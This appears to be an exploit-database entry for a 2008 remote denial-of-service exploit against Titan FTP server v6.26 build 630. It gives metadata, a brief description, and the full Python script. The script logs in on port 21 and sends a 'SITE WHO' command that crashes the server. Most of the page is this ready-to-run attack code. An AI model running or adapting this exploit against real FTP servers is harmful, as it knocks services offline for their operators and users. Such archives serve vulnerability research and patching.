header-logo
Suggest Exploit
vendor:
Titan FTP server
by:
(x)dmnt
7.5
CVSS
HIGH
Denial of Service (DoS)
N/A
CWE
Product Name: Titan FTP server
Affected Version From: v6.26 build 630
Affected Version To: v6.26 build 630
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

Titan FTP server v6.26 build 630 remote DoS exploit

This exploit is for Titan FTP server v6.26 build 630. It is a remote DoS exploit which is done on the 'SITE WHO' command. It requires the hostname, username and password to be provided as arguments. The exploit is coded in windows-1252 and uses a socket connection to connect to the hostname on port 21. It then sends the username and password and then sends the 'SITE WHO' command which causes the server to crash.

Mitigation:

N/A
Source

Exploit-DB raw data:

# Titan FTP server v6.26 build 630 remote DoS exploit
# Titan FTP URL - http://www.titanftp.com/
# DoS'ed on "SITE WHO" command
# (x)dmnt
# -*- coding: windows-1252 -*-

import socket
import sys

def help_info():
    print ("Usage: titand0s <host> <login> <password>\n")
    print ("Note: anonymous is enought\n")

def dos_it(hostname, username, passwd):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("[-] Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] " + r
    sock.send("user %s\r\n" %username)
    r=sock.recv(1024)
    sock.send("pass %s\r\n" %passwd)
    r=sock.recv(1024)
    print "[+] Send evil string"
    sock.send("SITE WHO\r\n")
    sock.close()
    print "[0] Now server d0s'ed"

print ("\n]Titan FTP server v6.26 build 630 remote DoS exploit[")
print ("](x)dmnt 2008[\n\n")

if len(sys.argv) <> 4:
    help_info()
    sys.exit(1)

else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    dos_it(hostname,username,passwd)
    sys.exit(0)

# milw0rm.com [2008-10-14]